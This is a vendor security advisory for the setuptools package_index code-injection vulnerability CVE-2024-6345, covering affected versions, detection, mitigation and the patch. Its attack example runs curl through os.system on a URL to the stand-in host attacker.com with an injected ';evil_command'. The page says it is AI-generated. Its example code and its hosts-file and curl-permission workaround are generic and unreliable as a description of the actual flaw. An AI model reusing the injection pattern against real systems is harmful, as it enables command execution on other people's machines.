SentinelOne
CVE Vulnerability Database
Vulnerability Database/CVE-2024-6345

CVE-2024-6345: pypa/setuptools RCE Vulnerability

CVE-2024-6345 is a remote code execution vulnerability in pypa/setuptools package_index module that allows attackers to inject and execute arbitrary commands. This article covers technical details, affected versions, and mitigation.

Updated:

CVE-2024-6345 Overview

A vulnerability in the package_index module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.

Critical Impact

This vulnerability allows remote code execution, potentially leading to full system compromise.

Affected Products

  • pypa/setuptools versions up to 69.1.1
  • Not Available
  • Not Available

Discovery Timeline

  • Not Available - Vulnerability discovered by Not Available
  • Not Available - Responsible disclosure to Not Available
  • Not Available - CVE CVE-2024-6345 assigned
  • Not Available - Not Available releases security patch
  • 2024-07-15 - CVE CVE-2024-6345 published to NVD
  • 2025-11-04 - Last updated in NVD database

Technical Details for CVE-2024-6345

Vulnerability Analysis

The vulnerability arises from insecure handling of URLs in the package_index module. This module fails to properly sanitize inputs, allowing malicious actors to inject arbitrary code via manipulated package URLs. The code execution occurs due to insufficient checks around what is executed during the download process.

Root Cause

Lack of input validation and sanitization when processing URLs leads to code injection.

Attack Vector

This vulnerability can be exploited over a network, where an attacker provides a specially crafted package URL, which then leads to code execution on the vulnerable system.

python
# Example exploitation code (sanitized)
import os

def download_package(url):
    os.system(f"curl {url} -o package.zip")

# Malicious URL
malicious_url = "http://attacker.com/malicious?;evil_command"
download_package(malicious_url)

Detection Methods for CVE-2024-6345

Indicators of Compromise

  • Unexpected network requests to untrusted sources
  • Unusual process executions in conjunction with package installations
  • Anomalies in package download paths

Detection Strategies

Utilize Endpoint Detection and Response (EDR) systems to monitor for suspicious behaviors such as curl being used to download executables or scripts. SentinelOne products can leverage behavioral AI to detect such anomalies.

Monitoring Recommendations

  • Monitor network traffic for unexpected destinations.
  • Audit system calls related to downloading and executing files.
  • Maintain logs of executed commands during package installations.

How to Mitigate CVE-2024-6345

Immediate Actions Required

  • Update to setuptools version 70.0 or later.
  • Restrict execution permissions for non-trusted users.
  • Implement strict input sanitization on all user-provided data.

Patch Information

Upgrade setuptools to version 70.0, where the vulnerability is patched. This removes the deprecated code paths susceptible to injection.

Workarounds

Isolate vulnerable systems from sensitive environments and apply network restrictions to minimize exposure.

bash
# Configuration example
echo "127.0.0.1 attacker.com" >> /etc/hosts
chmod -x /usr/local/bin/curl

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne